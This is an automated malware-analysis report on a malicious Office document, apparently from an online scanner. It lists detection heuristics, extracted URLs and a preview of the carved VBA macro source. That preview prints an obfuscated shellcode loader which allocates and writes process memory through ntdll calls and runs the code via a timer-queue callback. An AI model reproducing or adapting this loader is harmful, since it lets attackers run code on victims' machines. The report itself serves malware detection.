MALICIOUS
82
Risk Score
Heuristics 3
-
Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADERRaw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6601 bytes |
SHA-256: ae990ab2d6f06f82402b627cf6e15fe22f737a2c96029645b8240d702749d22b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "portos"
' His passion is a kiss
' Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' Stirb nicht
' Dont die before I do
Public Declare PtrSafe Function summary _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal degeneration As Any, ByVal somatotropin As Any, ByVal caduceus As Any, ByVal monasticism As Any, ByVal amotion As Any) As LongPtr
' Ich warte hier
' I dont know who you are
Public Declare PtrSafe Function euphorbium Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal chipping As Any, gangrenous As Any, categorial As Any, aerodynamics As Any) As LongPtr
' Die Nacht A¶ffnet ihren SchoAY
' Ich weine leise in die Zeit
#End If
' Die Nacht A¶ffnet ihren SchoAY
' Es ist kalt und regungslos
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' I dont know who you are
Public Declare Function carelessly Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal noahs As Any, fortunately As Any, denounce As Any, synchrocyclotron As Any) As Long
' I dont know who he is
' Ich weiAY dass irgendwann
#End If
' Doch ich weiAY dass es dich gibt
' Ich weine leise in die Zeit
Function endowed(horrifyingly, flyfishing, obliteration)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim rescription As LongPtr
Dim cenchrus As LongPtr
Dim although As LongPtr
Dim ephemerality As LongPtr
Dim uncommunicativeness As LongPtr
#End If
#If (44 - 40 + 396 + 120 - 65 + 245) > ((58 - 7 + 269) - (47 - 37 + 530) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cenchrus As Long
Dim rescription As Long
Dim ephemerality As Long
Dim although As Long
Dim expiable As String
Dim uncommunicativeness As Long
#End If
cenchrus = horrifyingly
uncommunicativeness = obliteration
ephemerality = flyfishing
chancroidal = 60 + 48
Pmt 0, chancroidal, 22143, 18381, 4
adenoidal = Rnd(83)
rescription = 35 - 74 + 38
summary ByVal rescription, cenchrus, ephemerality, uncommunicativeness, although
naja = "bever"
End Function
Function zambia()
Dim bi(255) As Byte
coniferopsida = 16 - 86 + 135
Do While coniferopsida <= 90 + 1
bi(coniferopsida) = coniferopsida - 65
coniferopsida = coniferopsida + 1
Loop
coniferopsida = 48
Do While coniferopsida <= 50 + 8
bi(coniferopsida) = coniferopsida + 4
coniferopsida = coniferopsida + 1
Loop
coniferopsida = 97
Do While coniferopsida <= 120 + 3
bi(coniferopsida) = coniferopsida - 71
coniferopsida = coniferopsida + 1
Loop
bi(47) = 63
coniferopsida = 43
bi(coniferopsida) = 60 + 2
zambia = bi
End Function
Attribute VB_Name = "mildran"
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Public Declare _
PtrSafe Function homocercal Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (mb As LongPtr, draped As LongPtr, ByVal halfhearted As LongPtr, pandiculationByVal As LongPtr, professionalism As LongPtr, ByVal meryta As LongPtr) As LongPtr
#ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Public Declare Function summary Lib "ntdll " Alias "NtWriteVirtualMemory" (ByVal ademption As Any, ByVal accredit As Any, ByVal transit As Any, ByVal absolved As Any, ByVal arma As Any) As Long
#End If
Function eyelid(kriegspiel)
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cosmetologist As Long
architeuthis = 44 - 59 + 19
Dim homophonic As Long
Dim philosophers As Long
#End If
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim cosmetologist As LongPtr
architeuthis = 6 - 68 + 70
Dim homophonic As LongPtr
Dim philosophers As LongPtr
#End If
besieged = VarPtr(cosmetologist)
polemonium = endowed(besieged, VarPtr(kriegspiel) + 8, architeuthis)
real = 125 - 95 - 31
homophonic = 91 - 108 + 17
mirror = 40 - 120 + 80
philosophers = 86 - 108 + 9379
droplet = 29 - 117 + 4184
disheartened = 124 - 67 + 7
intermezzo = homocercal(ByVal real, _
homophonic, ByVal mirror, philosophers, ByVal droplet, _
ByVal disheartened)
endowed homophonic, cosmetologist, 73 - 70 + 5880
necrology = 44 + 32
Pmt 0, necrology, 32324, 46690, 8
eyelid = homophonic
End Function
Function atopognosia(nerodia, papyrus, caterpillar)
Select Case caterpillar
Case 48 + (10 / 2 - 5)
atopognosia = nerodia \ papyrus
Case 58 + (5 - 3) / 2 - 1
atopognosia = nerodia And papyrus
Case 66 + (56 / 7 - 4 * 2)
atopognosia = nerodia * papyrus
End Select
End Function
Attribute VB_Name = "sideboard"
' Es ist kalt und regungslos
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' Die Nacht A¶ffnet ihren SchoAY
' Ich weiAY nicht wie du heiAYt
Public Declare Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (obstinate As Any, ByVal aminomethane As Any, ByVal defy As Any, ByVal elre As Any, ByVal nfor As Any, ByVal bise As Any, ByVal allophonic As Any) As Long
' Sometimes love seems so far
' Dont die before I do
Public Declare Function homocercal Lib _
"ntdll " Alias _
"NtAllocateVirtualMemory" (hindustan As Long, angler As Long, ByVal dislikable As Long, euphractusByVal As Long, retribution As Long, ByVal arrogance As Long) As Long
' I close my eyes and pass away
' I dont know who you are
Public Declare Function sod Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal homespun As Any, decolonization As Any, audile As Any, drip As Any) As Long
' Ich warte hier
' irgendwer mich liebt
#End If
' His passion is a kiss
' Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' Stirb nicht
' No words are left to say
Public Declare PtrSafe Function planococcus Lib "Shlwapi.dll " _
Alias "SleepConditionVariableSRW" (ByVal cacation As Any, faciles As Any, diethylstilbestrol As Any, barbecuing As Any) As LongPtr
' Doch ich weiAY dass es dich gibt
' Ich weiAY dass irgendwann
Public Declare PtrSafe Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (aerography As Any, ByVal custacean As Any, ByVal shihtzu As Any, ByVal blastoderm As Any, ByVal bobble As Any, ByVal coadjutor As Any, ByVal phasianus As Any) As Long
' Ich weine leise in die Zeit
#End If
Attribute VB_Name = "unwelcome"
Attribute VB_Base = "0{BEDAA815-8A97-4A26-8D30-53369C8F0A8B}{09205486-3054-4B45-A06E-0137BB9F7141}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.